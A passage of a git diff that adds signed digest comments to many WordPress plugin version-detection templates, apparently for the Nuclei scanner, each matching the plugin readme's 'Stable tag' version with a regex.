b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..8a1ab8ac28 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c4aade3b051b831f2dad4b53d6147781b9bc7e012f9991c84d218b79bb82ae1b022022700907ad664de4c30bec6a41556d32f86d70140ede1049789a26d8d8f60772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..6f1471becc 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220220c8f284284497eb9e7be0bbd1176b50eb36bee2c1b365dcc1c27727bd75ede022100c27a16245a48f97763d900de6399b258af6559ed8e1589a0adae47dbaf8d7340:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..c48ee10712 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022030f207e254246935d46280a7ddbc6bea63e5eb7ce966f5ac2be2a7b9de7c3dd402201363d00316cbcdf19ee663662d788ea7449157066f4d889a561239004985d476:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..169defa16a 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220374272efd068099e0ccba6e9a0bc6fc9e4d75d77648eb0bcb848f78855a280fe022100f96821f423a5520892e9364d388e1b926dd7494a16af02fb3bc8278be1f4f1b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..8d957b23f3 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220264cde318f2710a4ceeb38276e13c87d7e18407f7a421d53c6b6ab4c6a8905c902203492bc8e975e1ff94ba9f171f571159206e9b4f58dae8d825ea6e12ada39df0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..d124135f60 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220482b93319a21077e744fb59a9bd87ae372a1cb5661db88bb608c44b18b0810a5022100ed696bc8a8f0333417450617f650316ceae3d75fb070813cb0e871a2673bd542:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..16483912fe 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220628332b713b6dd181805348e87b9ef1f0455d22a87c7982576693d5afec3adc30221009e28809e5ad8e47a4a08db4f21cb38fc0cae779daccca9b38898829f97f93f87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..56ad4f9367 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e1665ac4fc49f85de15d55aaf1b890e3d9fb18120fb27196b1576666a2aa1fa2022100cba09d3d275800a07095256a45338f5ad6826c489855bfcfdc7bc3d2734646ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..0e5c38fb96 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ac98cec51430a1ba1898feaafc44b477c890e82bd18783880bd69a581e509651022100c6b99b6ac7134cee8e28e30eba0c90215778edfc1d0d75813a1ccaa119239fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..729d5a1fe8 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220581a59076bff58be3c2baf6be3e54861e067e743ba3487c5aefd6f0f67c29089022100994b749c1a3ba0570107f28a3e24ad70bb4ef796a64ee58d1468b2062b622a8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..5f46ab7436 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022077b0108c4b1f60b75baacaac1b4e06c2ae404739e97413996cb9d8bb58460bd602204416a47fbde2821e538c63a61322d209946d3fee15868b12fe8c0c0a54bdc0e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..22a7c21e14 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ee1ed6c4b878b62275d1058fe9e7a7ddbea296b358be1390f16c711111c01d17022100e294695baa8c0d79b9fb15f051faad3a206f7feb6aaa058929ff46cb691a64ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..3a3bd03cb3 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5c858e9cd0b452231d487576c7c3a836ef97967433eec3b9d1d1819566532300221008acc87ad1a0983fc9542393fdb0483e427db0980d2f02cc1ea6e9471ed0f1781:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..704d811001 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022034eda9478cbdc475b6dd6b178a087e67d00624e0a3583ac1c241c33b6baea1fb022061b8085d7a637f72f17cb7ffd8fcc6ea8e79fd44b26ab9bdbf47cf0b612e3700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..ef28c52a78 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100868f5626008efffc62ed64db4ef3976016130771f1b0dd491eb4ee52a8d1870c022100a87e44027b150413a5351e2928a9e5bf5189df94817a4ea3783fafa8850a6215:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..7c3a0e5308 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220627b84da19b837adfd3f6a800cd85c7114d1d208b9af7a9dadcdc1cd872dfce3022100ceb47b50b390e4009e1251187647596263a612f2127aaaa468f6fe0aa886ef29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..a144fef015 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220230889aa1479b5b3824454068f759c16d2f752ac641661694fb468d46dfa10870220193b924e02f14b10be9aa707a17bbc167e85221355adf4cca138ed57fd03ce48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..f03d4112c8 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fec8b9fd35367cc2b6b97b7d24cb576f85f1d6058ff5f80e9a1e51fe07d22bcb022100d7924dee2b43a879af8d2e1485b53517ca5ae4ec1ff9f7a29f30d795bceb271c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..e22ac22fa3 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220444f253e4c0a556696dc068c825b09f97ff6d425f4e698044a01783a06b916f502201ff4dd34c8d373af8cbf58294bbbb2e8a9a70e82549b1fed75f0ac3b83d16017:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..d7ce6a8742 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204b54c649a8164c3510f424998f68eac9bbaaf85a8b1f0df14869c153c2cd54d1022007b79c7458203a4c8ddc299c96357a5938c1e93cbcede8e6fc9b135e28256267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..2ef77868ec 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022024094acd37f83acbff0b903588474e21ba1cfd4fa954ff7645efa1528bf2b881022100f0234939dc81203a161963ec0c9c9f365aa482627674f9c1a1553d9734afd0b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..e2e9e3b0e9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d276d853d061233075dba4bc894eed35e2a6dfffe7319e9c6f4ff8db08db95610220277c459f04777a77b1420c814023c47dc486d15e12e779e3aa1a6068d672299b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..e1ba6078d7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f08446643c06f51b457036f7627af63d7c6d2a0b03f7bf9d892bc4081d19806022100e45e9d4bad72f8b80cefddc115740fe5ba720e448e53135ea569737ff33a1fc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..c9b0e23dcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220690f0438641d45b3179528e929d26c97355f86d0e99c4dd300cf53c7a3b050e7022023ff0f0c33479f076a12333cf26eefcf58b19fd1127429cc3c9f5faae2021675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..748b062dd0 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a23dab8f41bfbed907caa1fd9fb2dc982b323ff31edb63cd002f79fb5fe0f42c0221008b2f86f2652550134457da90b23fd780528712dfd484076cbb10dcd45c30d0bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..5917f54b45 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202e609c01848fe7fa72a5a68b6b40ba852fe2b764bdcba1430878a1bfac72e88d02206330f4ca49f32fb0ed473b5388a4455af3d0c4adf3fe67f1a24c3272a599ed72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..e57761b04b 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e1b6ca4058d8643884e8abe8a4d82cd44cdbdb57086095b314045b3a706d78d802210082f887bb6d33bae2fdb064af7828dbbf8da6dc7d28e63a89cbf5454370a6deb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..b01710131a 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cdee863d49782412ab52ca741e919b76f98dd0963a8b2814fd8e09da5abdbf29022100dc982d9ce3af35284fcbab9b1eebea3bb8ca9be79cfd34817ee6740a5705933f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..007533f212 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205e11cc1fe41a21f0326c68812e0964eac30529ad6aaea6eab9c72a68561ca3890220452f7e91b63c157406996960ec15737cafe47012d6ddcfb93e89b130cd6fc1d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..4c4fc31429 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cd7673fc7595e0a5065f0b017fc4f80aae24610858f9bb0b702de6c408070acf0221009c56113b97921e450e3eff8fddc7c0d05abf44f3e7216e2c80e95bfb361b85ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..bf3fc280e1 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201588a8e80ac492846b003b3ebe2f2024199f8cc00cbd744874a1105f7f42db84022100a12e3b7f25e9ec792d8eed7a1db6e083d647128550e964c540907137213e7d9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..8437fe8e06 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a82aca6ebfdd52a53f5593f98e10eddf8e61bb6c14b70c90289bd1121437624c022100deac835b23019dc87a70211a023bb4a71d5ba3b5cd900c2b6c5ab4fcf1411745:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..9895d21150 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a90f7ab17bc92f5d0658e618eca82bb407c98258a0c2a41f6ccbb814a874c310022100f50eb930d1c842bd24b311ac590bae17fb85458d34cd60d2f36c5a32ed15a126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..2bd6cf720b 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200ff9be6ed84ad5ef63e754e78f7f9525998a61c121d13df6cd980cb31b21022102201f3f62162863ce3684784ec5cce1b10787eb751b1b33433c9b3d908d850cee21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..9e4567e6db 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202ed866c67e652f3a0305d10f99a834d5c3874b16607bcca045ef67c741752e1102210090167bae37fccf518ae99bf293d0c13f1f615e2fc3688db6a0de19900db24d68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..28e77c2dff 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f15c26a04c6428c6b430dc8f14d1a60b4c99a126cd43ea30b24291575d410ea7022070cce3a5a4ecf00fd19dd25f8a7c1bce8a49d7e731e8a5910c8762e612cab10f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..bc57ac1012 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bde9366099040b82c3755acef55a935ce7ee4a0f66b0d9bd9e10a44cc8d42eae022100fb187244ff8039da101e912aad189be3abb159b86a4ad66c7196b3027e979c96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..674b140c79 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206283fb7cc9083ea3fecedd4dbd5bb6d7e10c2b1f83b1fdd86de0252d83f9383c02202746fec11780dbd209348da247eb6907684b75569fe4dca9f995120ea90627c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..bb8942c9db 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100822c8c8ae1fe8f14449cfec58308c8d6b1333de041886ef1ff8c737d1765cd33022100c9571fb5745307a01c1655fb0bfa95f08445f16782cc134f0f71657316bb7119:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..404f7efad9 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002248fba3a1e16633d81331cce0d1f30da81d88cc0114a920e23342d699181380221008e010a0f4c0cb5fdd504ad839eb4ea9b040041bac6cda20c1b785b4714d209f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..a39b963183 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c0e25a1cc83e187433290aad77d39de8d7874ed7939860d737ebc643d1ef5173022100ef2e345ad050cb76b28a6430cea2377573a121eb95e661b08202fbdd0f4edeb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..8d915408bf 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d87e706aa2b0738badea88c663ffff6f9d1b34a39f65a6ae2d024b7b73d369af0220229dc9fb5051050651f7431e1ee2b1905daf533387be2641a40b3bb0ba0c6e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..41841560a9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c76331da2fe7f533a86d60ceececa0a8b92ddc7965a4d42666b31e61c40db10602202e146683edb2849f19d7e0e5ee22682da24fdb8dc9b31e8c2896809e5cc3fa2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..60ae201319 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210080153ecb2ac38db8039282adb79486f67e82d9352d4edc2b0f32e4a95667556b0220131eea3c9ec8804673c9d3dd2d5a58ac09991bf077e374b343ae82f4d56bc2ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..f4b3d5a129 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022027baad482dc0d251aebe5af0a175e4ad61335680ca28fe4dfc88b1f9826c56cc02200450f8a146ff3cd5405b63763a790d91f71351ed982256a3c47395e275720d48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..73c62fc1f9 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204f0750ca607f0c0428e69b3a7b7969b1af4e3b10711c0abc4cf71808ce1ff038022100901c1be8a746192071e89ebb86342654ecb56d087334476bf793dd1817399a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..95e4dde105 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - 